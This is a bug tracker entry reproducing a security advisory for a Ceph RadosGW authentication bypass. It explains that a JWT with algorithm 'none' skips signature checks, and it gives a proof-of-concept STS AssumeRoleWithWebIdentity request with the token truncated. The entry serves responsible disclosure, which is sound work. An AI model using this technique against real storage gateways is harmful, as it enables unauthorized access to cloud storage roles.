+++ This bug was initially created as a clone of Bug #2323274 +++

https://github.com/ceph/ceph/security/advisories/GHSA-5g9m-mmp6-93mq
Summary below: 
Description
Summary

It is possible to bypass the CEPH rados authentication gw by proving an JWT as demonstrated in the PoC. In this case Keycloak is used as IdP.

This was found during a penetration test. Please assign CVE and credit me as finding this vulnerability. Do not mention the customer/organisation in public reports etc.

Details has also been provided to security before. As always, please fix this within 90 days as we plan to go public.
Details

It is possible to send an JWT that has "none" as JWT alg. And by doing so the JWT signature is not checked.

The vulnerability is probably in the RadosGW OIDC provider.
PoC

The HTTP request can be found below. But without the JWT:

POST / HTTP/2
Host: storage.xxx.se
User-Agent: aws-sdk-go-v2/1.18.0 os/macos lang/go/1.21.1 X:nocoverageredesign md/GOOS/darwin md/GOARCH/arm64 api/sts/1.19.0
Content-Type: application/x-www-form-urlencoded
Amz-Sdk-Invocation-Id: 30a74697-7d7e-4c02-b041-97d68156ee78
Amz-Sdk-Request: attempt=1; max=3
Content-Length: 1508
Accept-Encoding: gzip, deflate, br

Action=AssumeRoleWithWebIdentity&DurationSeconds=3600&RoleArn=arn%3Aaws%3Aiam%3A%3Aorg_pentest002%3Arole%2Fu-pentest002STS&RoleSessionName=test&Version=2011-06-15&WebIdentityToken=ey..

Impact

This was found during a penetration test. Please assign CVE and credit me as finding this vulnerability. We can also request CVE from Mitre.